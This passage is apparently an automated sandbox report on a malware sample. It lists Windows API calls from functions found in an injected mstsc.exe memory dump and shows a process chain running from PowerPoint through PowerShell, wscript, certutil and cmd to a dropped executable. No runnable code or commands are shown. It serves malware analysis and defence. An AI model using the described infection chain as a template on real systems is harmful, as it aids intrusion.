Part of subcall function 00063ADC: HeapFree.KERNEL32(00000000), ref: 00063DF8
Part of subcall function 00063ADC: GetProcessHeap.KERNEL32(00000000,00000000,00020006), ref: 00063E04
Part of subcall function 00063ADC: HeapFree.KERNEL32(00000000), ref: 00063E07

Part of subcall function 00063300: lstrcpyA.KERNEL32(00000000,?), ref: 000633A1
Part of subcall function 00063300: lstrcpyA.KERNEL32(-00000020,00072000), ref: 000633AD

Part of subcall function 0006482B: GetProcessHeap.KERNEL32(00000000,?,?,00000000,0006318E,?,?,?,?,?,?,?,?,?,?,00062973), ref: 00064845
Part of subcall function 0006482B: HeapFree.KERNEL32(00000000,?,?), ref: 0006484C

SetEvent.KERNEL32 ref: 0006350D

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 000677D7, Relevance: 9.1, APIs: 6, Instructions: 94

APIs

Part of subcall function 000686AF: GetProcessHeap.KERNEL32(00000008,00000208,00000000,?,00000000,000677F1,00000000,?), ref: 000686D1
Part of subcall function 000686AF: HeapAlloc.KERNEL32(00000000), ref: 000686D8
Part of subcall function 000686AF: GetModuleFileNameW.KERNEL32(00000104,00000000,00000104), ref: 000686EC
Part of subcall function 000686AF: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006870B
Part of subcall function 000686AF: HeapFree.KERNEL32(00000000), ref: 0006870E
Part of subcall function 000686AF: GetProcessHeap.KERNEL32(00000008,00000000), ref: 0006871A
Part of subcall function 000686AF: HeapAlloc.KERNEL32(00000000), ref: 0006871D
Part of subcall function 000686AF: GetLastError.KERNEL32 ref: 0006873B
Part of subcall function 000686AF: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00068746
Part of subcall function 000686AF: HeapFree.KERNEL32(00000000), ref: 0006874D

Part of subcall function 00061B2B: lstrcmpA.KERNEL32(?,?), ref: 00061B77

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00067861
SetFilePointer.KERNEL32(00000000,?,00000000,00000000,?,?,?,?,00068D00), ref: 00067876
ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 0006788E
CloseHandle.KERNEL32(00000000), ref: 000678A7

Part of subcall function 0006765B: GetProcessHeap.KERNEL32(00000008,0000001F,00000000,?,00000000), ref: 000676D7
Part of subcall function 0006765B: HeapAlloc.KERNEL32(00000000), ref: 000676DA
Part of subcall function 0006765B: GetProcessHeap.KERNEL32 ref: 000676EF
Part of subcall function 0006765B: GetProcessHeap.KERNEL32(00000008,0000000E), ref: 0006773B
Part of subcall function 0006765B: HeapAlloc.KERNEL32(00000000), ref: 0006773E
Part of subcall function 0006765B: IsSystemResumeAutomatic.KERNEL32 ref: 00067752
Part of subcall function 0006765B: GetModuleHandleA.KERNEL32(00000000,?), ref: 00067783
Part of subcall function 0006765B: GetProcAddress.KERNEL32(00000000), ref: 0006778A
Part of subcall function 0006765B: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006779E
Part of subcall function 0006765B: HeapFree.KERNEL32(00000000), ref: 000677A7
Part of subcall function 0006765B: GetProcessHeap.KERNEL32(00000000,?), ref: 000677AC
Part of subcall function 0006765B: HeapFree.KERNEL32(00000000), ref: 000677AF

GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000001,?,?,?,?,00068D00), ref: 000678C0
HeapFree.KERNEL32(00000000), ref: 000678C7

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 0006E60D, Relevance: 9.1, APIs: 6, Instructions: 54

APIs

lstrlenW.KERNEL32(?,00000000,00000000,?), ref: 0006E625
GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?), ref: 0006E634
HeapAlloc.KERNEL32(00000000), ref: 0006E63B
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 0006E654

Part of subcall function 0006E545: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,0006E667), ref: 0006E55F
Part of subcall function 0006E545: GetProcessHeap.KERNEL32(00000008,?,?,?,00000000,00000000,?,0006E667), ref: 0006E58D
Part of subcall function 0006E545: HeapAlloc.KERNEL32(00000000,?,0006E667), ref: 0006E594
Part of subcall function 0006E545: GetProcessHeap.KERNEL32(00000000,00000000,?,0006E667), ref: 0006E5E9
Part of subcall function 0006E545: HeapFree.KERNEL32(00000000,?,0006E667), ref: 0006E5F0

GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006E66D
HeapFree.KERNEL32(00000000), ref: 0006E674

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 0006D97F, Relevance: 9.1, APIs: 6, Instructions: 51

APIs

ExpandEnvironmentStringsW.KERNEL32(00106D80,00000000,00000000,00106D80,00106D80,00106D80,00106D80,?,0006DA06,00072000,7142434B,00106D80,?,00061ADF,?), ref: 0006D991
GetProcessHeap.KERNEL32(00000008,00000000,?,0006DA06,00072000,7142434B,00106D80,?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x), ref: 0006D9AB
HeapAlloc.KERNEL32(00000000,?,0006DA06,00072000,7142434B,00106D80,?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006D9B2
ExpandEnvironmentStringsW.KERNEL32(00106D80,00000000,7142434B,00000000,?,0006DA06,00072000,7142434B,00106D80,?,00061ADF,?), ref: 0006D9CD
GetProcessHeap.KERNEL32(00000000,00000000,0006DA06,00072000,7142434B,00106D80,?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006D9DA
HeapFree.KERNEL32(00000000,?,00061ADF), ref: 0006D9E1

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 0006849D, Relevance: 7.6, APIs: 6, Instructions: 131

APIs

Part of subcall function 000674D8: GetProcessHeap.KERNEL32(00000008,00000010,00000000,?,00000000), ref: 0006752D
Part of subcall function 000674D8: HeapAlloc.KERNEL32(00000000), ref: 00067530
Part of subcall function 000674D8: GetMessageTime.USER32 ref: 00067544
Part of subcall function 000674D8: GetProcessHeap.KERNEL32(00000008,0000000E), ref: 0006759E
Part of subcall function 000674D8: HeapAlloc.KERNEL32(00000000), ref: 000675A1
Part of subcall function 000674D8: IsSystemResumeAutomatic.KERNEL32 ref: 000675B5
Part of subcall function 000674D8: GetModuleHandleA.KERNEL32(00000000,?), ref: 000675E6
Part of subcall function 000674D8: GetProcAddress.KERNEL32(00000000), ref: 000675ED
Part of subcall function 000674D8: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00067601
Part of subcall function 000674D8: HeapFree.KERNEL32(00000000), ref: 0006760A
Part of subcall function 000674D8: GetProcessHeap.KERNEL32(00000000,?), ref: 0006760F
Part of subcall function 000674D8: HeapFree.KERNEL32(00000000), ref: 00067612
Part of subcall function 000674D8: OpenProcess.KERNEL32(00000400,00000000,?,00000000), ref: 0006762E
Part of subcall function 000674D8: IsWow64Process.KERNELBASE(00000000,00000000), ref: 0006763F
Part of subcall function 000674D8: CloseHandle.KERNEL32(00000000), ref: 0006764D

Part of subcall function 00067C11: GetProcessHeap.KERNEL32(00000008,0000000B,00000000,?,00000002), ref: 00067C57
Part of subcall function 00067C11: HeapAlloc.KERNEL32(00000000,?,00000002), ref: 00067C5A
Part of subcall function 00067C11: GetShellWindow.USER32 ref: 00067C6F
Part of subcall function 00067C11: GetProcessHeap.KERNEL32(00000008,00000022,?,00000002), ref: 00067CF0
Part of subcall function 00067C11: HeapAlloc.KERNEL32(00000000,?,00000002), ref: 00067CF3
Part of subcall function 00067C11: GetProcessWindowStation.USER32 ref: 00067D08
Part of subcall function 00067C11: GetModuleHandleA.KERNEL32(?,?,00000002), ref: 00067D47
Part of subcall function 00067C11: GetProcAddress.KERNEL32(00000000,00000000,?,00000002), ref: 00067D70
Part of subcall function 00067C11: GetModuleHandleA.KERNEL32(?,?,00000002), ref: 00067D86
Part of subcall function 00067C11: GetProcessHeap.KERNEL32(00000008,00000022,?,00000002), ref: 00067DED
Part of subcall function 00067C11: HeapAlloc.KERNEL32(00000000,?,00000002), ref: 00067DF0
Part of subcall function 00067C11: GetProcessWindowStation.USER32 ref: 00067E02
Part of subcall function 00067C11: GetProcAddress.KERNEL32(00000000,?,00000002), ref: 00067E31
Part of subcall function 00067C11: GetProcessHeap.KERNEL32(00000000,00000000,?,00000002), ref: 00067E3F
Part of subcall function 00067C11: HeapFree.KERNEL32(00000000,?,00000002), ref: 00067E42
Part of subcall function 00067C11: GetProcessHeap.KERNEL32(00000008,00000200,?,00000002), ref: 00067E89
Part of subcall function 00067C11: HeapAlloc.KERNEL32(00000000,?,00000002), ref: 00067E8C
Part of subcall function 00067C11: GetProcessHeap.KERNEL32(00000008,00000100,?,00000002), ref: 00067EA4
Part of subcall function 00067C11: HeapAlloc.KERNEL32(00000000,?,00000002), ref: 00067EA7
Part of subcall function 00067C11: GetProcessHeap.KERNEL32(00000000,76E6FE8D,?,00000002), ref: 00068065
Part of subcall function 00067C11: HeapFree.KERNEL32(00000000,?,00000002), ref: 0006806C
Part of subcall function 00067C11: GetProcessHeap.KERNEL32(00000000,00000000,?,00000002), ref: 0006807F
Part of subcall function 00067C11: HeapFree.KERNEL32(00000000,?,00000002), ref: 00068082
Part of subcall function 00067C11: GetProcessHeap.KERNEL32(00000000,00000000,?,00000002), ref: 000680B5
Part of subcall function 00067C11: HeapFree.KERNEL32(00000000,?,00000002), ref: 000680BE
Part of subcall function 00067C11: GetProcessHeap.KERNEL32(00000000,?,?,00000002), ref: 000680C3
Part of subcall function 00067C11: HeapFree.KERNEL32(00000000,?,00000002), ref: 000680C6

VirtualAlloc.KERNEL32(00000000,76E6FE8D,00003000,00000004,00000000,00000008,76E6FE8D,?,000681EC,00000000,00000008,76E6FE8D), ref: 000684DD
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,000681EC,00000000), ref: 00068518
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,?,000681EC,00000000), ref: 00068528
lstrcmpiA.KERNEL32(?,?), ref: 00068562
lstrcmpiA.KERNEL32(?,?), ref: 00068585
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,000681EC,00000000), ref: 000685D1

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 00064D73, Relevance: 7.6, APIs: 5, Instructions: 74

APIs

OpenProcess.KERNEL32(0000043A,00000000,?), ref: 00064D9C
GetCurrentProcess.KERNEL32 ref: 00064DE5

Part of subcall function 00064C1F: GetProcessHeap.KERNEL32(00000008,00000010), ref: 00064C65
Part of subcall function 00064C1F: HeapAlloc.KERNEL32(00000000), ref: 00064C68
Part of subcall function 00064C1F: GetMessageTime.USER32 ref: 00064C7D
Part of subcall function 00064C1F: GetProcessHeap.KERNEL32(00000008,0000000E), ref: 00064CD4
Part of subcall function 00064C1F: HeapAlloc.KERNEL32(00000000), ref: 00064CD7
Part of subcall function 00064C1F: IsSystemResumeAutomatic.KERNEL32 ref: 00064CEB
Part of subcall function 00064C1F: GetModuleHandleA.KERNEL32(00000000,?), ref: 00064D1C
Part of subcall function 00064C1F: GetProcAddress.KERNEL32(00000000), ref: 00064D23
Part of subcall function 00064C1F: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00064D4F
Part of subcall function 00064C1F: HeapFree.KERNEL32(00000000), ref: 00064D5C
Part of subcall function 00064C1F: GetProcessHeap.KERNEL32(00000000,?), ref: 00064D61
Part of subcall function 00064C1F: HeapFree.KERNEL32(00000000), ref: 00064D68

Part of subcall function 00069240: GetVersion.KERNEL32(?,00000000,00000000), ref: 00069263
Part of subcall function 00069240: CloseHandle.KERNEL32(00000000), ref: 000693F9

Sleep.KERNEL32(00000032), ref: 00064E22
CloseHandle.KERNEL32(?), ref: 00064E38
CloseHandle.KERNEL32(?), ref: 00064E3E

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 0006CF97, Relevance: 7.6, APIs: 5, Instructions: 74

APIs

CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0006CFBF
ReadFile.KERNEL32(00000000,?,00000200,?,00000000), ref: 0006CFE2
ReadFile.KERNEL32(00000000,?,00000200,?,?), ref: 0006D035
CloseHandle.KERNEL32(00000000), ref: 0006D043

Part of subcall function 0006D9F1: CreateFileW.KERNEL32(00106D80,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0006DA1F
Part of subcall function 0006D9F1: GetFileSize.KERNEL32(00000000,00000000,?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006DA2E
Part of subcall function 0006D9F1: GetProcessHeap.KERNEL32(00000008,00000002,?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006DA47
Part of subcall function 0006D9F1: HeapAlloc.KERNEL32(00000000,?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006DA4E
Part of subcall function 0006D9F1: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0006DA63
Part of subcall function 0006D9F1: GetLastError.KERNEL32(?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006DA8B
Part of subcall function 0006D9F1: CloseHandle.KERNEL32(00000000), ref: 0006DA99
Part of subcall function 0006D9F1: GetProcessHeap.KERNEL32(00000000,00000000,?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006DAB0
Part of subcall function 0006D9F1: HeapFree.KERNEL32(00000000,?,00061ADF), ref: 0006DAB7
Part of subcall function 0006D9F1: GetProcessHeap.KERNEL32(00000000,?,?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006DAC3
Part of subcall function 0006D9F1: HeapFree.KERNEL32(00000000,?,00061ADF), ref: 0006DACA

Sleep.KERNEL32(000003E8,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0006D064

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 00066C0B, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50

APIs

wsprintfW.USER32 ref: 00066C4D
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00066C6B
CloseHandle.KERNEL32(00000000), ref: 00066C7A

Strings

%s --, xrefs: 00066C47

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 0006E545, Relevance: 6.3, APIs: 5, Instructions: 81

APIs

lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,0006E667), ref: 0006E55F
GetProcessHeap.KERNEL32(00000008,?,?,?,00000000,00000000,?,0006E667), ref: 0006E58D
HeapAlloc.KERNEL32(00000000,?,0006E667), ref: 0006E594
GetProcessHeap.KERNEL32(00000000,00000000,?,0006E667), ref: 0006E5E9
HeapFree.KERNEL32(00000000,?,0006E667), ref: 0006E5F0

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 0006D38E, Relevance: 6.1, APIs: 4, Instructions: 97

APIs

Part of subcall function 0006CF97: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0006CFBF
Part of subcall function 0006CF97: ReadFile.KERNEL32(00000000,?,00000200,?,00000000), ref: 0006CFE2
Part of subcall function 0006CF97: ReadFile.KERNEL32(00000000,?,00000200,?,?), ref: 0006D035
Part of subcall function 0006CF97: CloseHandle.KERNEL32(00000000), ref: 0006D043
Part of subcall function 0006CF97: Sleep.KERNEL32(000003E8,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0006D064

Sleep.KERNEL32(000927C0), ref: 0006D3C0

Part of subcall function 0006D076: GetProcessHeap.KERNEL32(00000008,00000029), ref: 0006D0F6
Part of subcall function 0006D076: HeapAlloc.KERNEL32(00000000), ref: 0006D0FD
Part of subcall function 0006D076: GetCapture.USER32 ref: 0006D10F
Part of subcall function 0006D076: WSAStartup.WS2_32(00000201,?), ref: 0006D147
Part of subcall function 0006D076: GetProcessHeap.KERNEL32(00000008,0000000F), ref: 0006D1F5
Part of subcall function 0006D076: HeapAlloc.KERNEL32(00000000), ref: 0006D1FC
Part of subcall function 0006D076: GetCurrentThreadId.KERNEL32 ref: 0006D20E
Part of subcall function 0006D076: wsprintfA.USER32 ref: 0006D241
Part of subcall function 0006D076: Sleep.KERNEL32(-0000EA60,00000000,?,00000000,00000000), ref: 0006D2A1
Part of subcall function 0006D076: GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00000000,00000000), ref: 0006D2CF
Part of subcall function 0006D076: HeapFree.KERNEL32(00000000), ref: 0006D2D6
Part of subcall function 0006D076: GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00000000,00000000), ref: 0006D310
Part of subcall function 0006D076: HeapFree.KERNEL32(00000000), ref: 0006D317
Part of subcall function 0006D076: GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00000000,00000000), ref: 0006D326
Part of subcall function 0006D076: HeapFree.KERNEL32(00000000), ref: 0006D32D
Part of subcall function 0006D076: GetProcessHeap.KERNEL32(00000000,?), ref: 0006D33E
Part of subcall function 0006D076: HeapFree.KERNEL32(00000000), ref: 0006D345

Part of subcall function 0006DD0B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 0006DD37
Part of subcall function 0006DD0B: GetLastError.KERNEL32(?,?,?,?,00061970,?), ref: 0006DD44
Part of subcall function 0006DD0B: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0006DD6B
Part of subcall function 0006DD0B: SetEndOfFile.KERNEL32(00000000,?,?,?,?,00061970,?), ref: 0006DD76
Part of subcall function 0006DD0B: GetLastError.KERNEL32(?,?,?,?,00061970,?), ref: 0006DD80
Part of subcall function 0006DD0B: SetFileTime.KERNEL32(00000000,?,?,?,?,?,?,?,00061970,?), ref: 0006DD95
Part of subcall function 0006DD0B: CloseHandle.KERNEL32(00000000), ref: 0006DD9C
Part of subcall function 0006DD0B: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00061970,?), ref: 0006DDA9
Part of subcall function 0006DD0B: HeapFree.KERNEL32(00000000), ref: 0006DDB0

Part of subcall function 0006D8BA: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?), ref: 0006D8EA
Part of subcall function 0006D8BA: SetEntriesInAclW.ADVAPI32(00000001,000000FF,00000000,?), ref: 0006D920
Part of subcall function 0006D8BA: LocalAlloc.KERNEL32(00000040,00000014), ref: 0006D92A
Part of subcall function 0006D8BA: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 0006D934
Part of subcall function 0006D8BA: SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,?,00000000), ref: 0006D941
Part of subcall function 0006D8BA: SetFileSecurityW.ADVAPI32(?,00000004,00000000), ref: 0006D94B
Part of subcall function 0006D8BA: FreeSid.ADVAPI32(00000000), ref: 0006D95A
Part of subcall function 0006D8BA: LocalFree.KERNEL32(00000000), ref: 0006D96F
Part of subcall function 0006D8BA: LocalFree.KERNEL32(00000000), ref: 0006D976

CreateThread.KERNEL32(00000000,00000000,0006D354,00000000,00000000,00000000), ref: 0006D47C
CloseHandle.KERNEL32(00000000), ref: 0006D483

Part of subcall function 0006482B: GetProcessHeap.KERNEL32(00000000,?,?,00000000,0006318E,?,?,?,?,?,?,?,?,?,?,00062973), ref: 00064845
Part of subcall function 0006482B: HeapFree.KERNEL32(00000000,?,?), ref: 0006484C

Sleep.KERNEL32(-0000EA60), ref: 0006D4B0

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 0006E967, Relevance: 6.0, APIs: 4, Instructions: 28

APIs

GetCurrentProcess.KERNEL32(00020008,0006E84F), ref: 0006E984
OpenProcessToken.ADVAPI32(00000000), ref: 0006E98B
GetTokenInformation.ADVAPI32(0006E84F,00000014,00000000,00000004,?), ref: 0006E9A4
CloseHandle.KERNEL32(0006E84F), ref: 0006E9AD

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 0006B8CA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50

APIs

PathFindFileNameW.SHLWAPI(76E645DF,00000000,76E6FE8D,?,?,?,?,?,?,KCBqiNhR7x,0006F429), ref: 0006B8D9

Part of subcall function 0006E60D: lstrlenW.KERNEL32(?,00000000,00000000,?), ref: 0006E625
Part of subcall function 0006E60D: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?), ref: 0006E634
Part of subcall function 0006E60D: HeapAlloc.KERNEL32(00000000), ref: 0006E63B
Part of subcall function 0006E60D: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 0006E654
Part of subcall function 0006E60D: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006E66D
Part of subcall function 0006E60D: HeapFree.KERNEL32(00000000), ref: 0006E674

Strings

KCBqiNhR7x, xrefs: 0006B8CA
CacX, xrefs: 0006B905

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 000647D4, Relevance: 5.0, APIs: 4, Instructions: 39

APIs

GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,76E6C570,0006D305,00000000,?,00000000,00000000), ref: 000647F4
HeapFree.KERNEL32(00000000), ref: 000647F7
GetProcessHeap.KERNEL32(00000008,?,?,00000000,76E6C570,0006D305,00000000,?,00000000,00000000), ref: 00064801
HeapAlloc.KERNEL32(00000000), ref: 00064804

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report

Overview

General Information

Detection

Confidence

Classification

Analysis Advice

Signature Overview

Spam, unwanted Advertisements and Ransom Demands:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Networking:

Remote Access Functionality:

Persistence and Installation Behavior:

Data Obfuscation:

Spreading:

System Summary:

HIPS / PFW / Operating System Protection Evasion:

Anti Debugging:

Malware Analysis System Evasion:

Hooking and other Techniques for Hiding and Protection:

Language, Device and Operating System Detection:

Behavior Graph

Yara Overview

Screenshot

Startup

Created / dropped Files

Contacted Domains/Contacted IPs

Contacted Domains

Contacted IPs

Static File Info

General

File Icon

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: POWERPNT.EXE PID: 2256 Parent PID: 1344

General

Analysis Process: powershell.exe PID: 2404 Parent PID: 2256

General

Analysis Process: wscript.exe PID: 2496 Parent PID: 2404

General

Analysis Process: certutil.exe PID: 2988 Parent PID: 2496

General

Analysis Process: cmd.exe PID: 3052 Parent PID: 2496

General

Analysis Process: 484.exe PID: 3076 Parent PID: 3052

General

Analysis Process: cmd.exe PID: 3104 Parent PID: 2496

General

Analysis Process: mstsc.exe PID: 3140 Parent PID: 3076

General

Disassembly

Code Analysis

Analysis Process: 484.exe PID: 3076 Parent PID: 3052

Execution Graph

Graph

Executed Functions

Function 0040EFB9, Relevance: 121.1, APIs: 45, Strings: 24, Instructions: 363

Function 001702B2, Relevance: 61.4, APIs: 18, Strings: 17, Instructions: 134

Function 0040F6F4, Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 120